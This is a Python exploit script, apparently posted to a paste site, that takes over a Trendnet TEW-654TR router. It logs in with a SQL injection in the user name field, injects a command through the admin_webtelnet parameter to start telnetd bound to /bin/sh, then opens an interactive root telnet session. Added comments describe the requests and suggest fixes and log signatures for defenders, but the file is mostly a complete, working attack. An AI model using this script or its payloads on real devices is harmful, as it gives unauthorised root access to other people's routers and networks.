
Trendnet TEW654TR Exploit Script

a guest
Jan 14th, 2012
  1. #!/usr/bin/env python
  2.  
  3. # Pop a root shell on the TEW-654TR via SQL injection & command injection.
  4. # Currently only works from the LAN side.
  5.  
  6. import re
  7. import httplib
  8. import urllib
  9. import socket
  10. import os
  11.  
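class Logging:
    """Minimal console logger: prints a message behind a severity tag."""

    # Severity levels; each value is the index of its tag in `prefixes`.
    WARN = 0
    INFO = 1
    DEBUG = 2
    prefixes = [" [!] ", " [+] ", " [@] "]

    @classmethod
    def log_msg(klass, msg, level=INFO):
        """Print ``msg`` to stdout prefixed with the tag for ``level``.

        Args:
            msg: Text to print. It is concatenated to the tag, so it must
                be a string.
            level: One of WARN, INFO or DEBUG. Defaults to INFO.

        Raises:
            IndexError: If ``level`` is past the end of ``prefixes``.
        """
        pref = Logging.prefixes[level]
        # Parenthesised form: prints the same text on Python 2 and is also
        # valid on Python 3, where a bare `print x` is a syntax error.
        print(pref + msg)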
  24.  
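def test_telnet():
    """Return True if 192.168.10.1 accepts a TCP connection on port 23.

    The script calls this after its second POST; a listener on the telnet
    port is what it treats as evidence that telnetd was started.

    Returns:
        True when connect() succeeds, False when it raises a socket error.
    """
    s = socket.socket()
    try:
        s.connect(("192.168.10.1", 23))
    except socket.error:
        return False
    finally:
        # Close the probe socket on both paths so the descriptor is not leaked.
        s.close()
    return True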
  32.  
def check_authentication(data):
    """Classify a login response by the first <redirect_page> marker found.

    Lines of ``data`` are scanned in order. The first line that carries
    either marker decides the result; a line carrying both counts as a
    failure because the ``back`` marker is tested first.

    Args:
        data: Response body as text.

    Returns:
        False if the deciding line contains
        ``<redirect_page>back</redirect_page>`` (that line is also logged at
        DEBUG level), True if it contains
        ``<redirect_page>default</redirect_page>``, None if no line has
        either marker.
    """
    rejected_marker = '<redirect_page>back</redirect_page>'
    accepted_marker = '<redirect_page>default</redirect_page>'

    # splitlines() leaves no newline inside a line, so a substring test is
    # equivalent to matching '.*<marker>' from the start of the line.
    for row in data.splitlines():
        if rejected_marker in row:
            Logging.log_msg(row, Logging.DEBUG)
            return False
        if accepted_marker in row:
            return True
    return None
  48.  
  49.  
  50.  
# Script body: two POSTs to /my_cgi.cgi on 192.168.10.1, then a check of
# TCP port 23 and a hand-off to the local telnet client.
#
# For defenders, the requests below show what to look for in device or proxy
# logs: a login POST whose user_name holds a quote and a second statement,
# then a request=admin_webtelnet POST carrying a cmd value, then port 23
# accepting connections on the router. Device-side fixes are a parameterised
# query in the login handler and a fixed set of allowed actions instead of a
# free-form cmd string; network-side, limit which LAN hosts can reach the
# management interface (the file header says this only works from the LAN).

# Value sent as the login user name. It closes a single-quoted string, appends
# a second statement and comments out the remainder.
# NOTE(review): that this is accepted implies the login handler concatenates
# user_name into its SQL text; the handler is not visible here - confirm
# against the firmware.
SQL_INJECTION="a';select 1;--"
# Value sent as `cmd` in the second request: telnetd with /bin/sh as its login
# program, i.e. a shell with no credential prompt (the file header describes
# the result as a root shell).
# NOTE(review): presumably the admin_webtelnet handler hands cmd to a shell
# unfiltered - confirm.
TELNET_INJECTION="/usr/sbin/telnetd -l /bin/sh"

username=SQL_INJECTION
password=""

# The body is assembled by string concatenation, which fixes the parameter
# order. user_name is appended without URL-encoding, so the quote, space and
# semicolons go out as literal bytes; user_pwd is appended with no '=' and,
# with the empty password, no value. Both details are visible on the wire.
params="request=login"
params+="&user_name="+username
params+="&user_pwd"+urllib.quote(password)

# Static, browser-like request headers. The same dict is reused for the second
# request with only Referer changed.
headers= {"Host":"192.168.10.1",
            "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:8.0.1) Gecko/20100101 Firefox/8.0.1",
            "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language":"en-us,en;q=0.5",
            "Content-Type":"application/x-www-form-urlencoded",
            "Referer":"http://192.168.10.1/login.htm"}

Logging.log_msg("Attempting to authenticate using SQL injection.")
#Logging.log_msg("SQL injection string set to: "+SQL_INJECTION)
Logging.log_msg("Sending POST.")
conn=httplib.HTTPConnection("192.168.10.1")

# The number in the query string is a fixed literal.
# NOTE(review): looks like a cache-busting value copied from the web UI - confirm.
conn.request("POST","/my_cgi.cgi?0.5219313003118983",params,headers)

response=conn.getresponse()
data=response.read()

Logging.log_msg("Got response: %s %s"%(str(response.status),response.reason))
conn.close()


# Three-way result: True or False from the <redirect_page> marker in the
# response, None when neither marker was found. Anything but True stops the
# script with exit status 1.
success=check_authentication(data)
if True==success:
    Logging.log_msg("Authentication successful.")
elif False==success:
    Logging.log_msg("Authentication failed. Exiting.",Logging.WARN)
    exit(1)
else:
    Logging.log_msg("Unrecognized result.",Logging.WARN)
    exit(1)


# Second request. Nothing from the login response (cookie, token) is attached;
# the only header that changes is Referer.
# NOTE(review): presumably the device tracks the logged-in state on its own
# side; how it does so is not visible here.
Logging.log_msg("Attempting to start telnetd via command injection.")
params="request=admin_webtelnet"
params+="&cmd="+urllib.quote(TELNET_INJECTION)
conn=httplib.HTTPConnection("192.168.10.1")
headers["Referer"]="http://192.168.10.1/st_device.htm"
conn.request("POST","/my_cgi.cgi?0.19909728029442098",params,headers)

response=conn.getresponse()

Logging.log_msg("Got response: %s %s"%(str(response.status),response.reason))

# The body of the second response is read but never inspected; success is
# judged only by the port probe below.
data=response.read()
conn.close()



# A listener on port 23 is taken as proof that the injected command ran.
if test_telnet():
    Logging.log_msg("Telnet started.")
else:
    Logging.log_msg("Telnet not started successfully.",Logging.WARN)
    exit(1)


# Fixed command string with no external input; hands the terminal to the
# system telnet client.
Logging.log_msg("Starting interactive telnet session.")
os.system("telnet 192.168.10.1")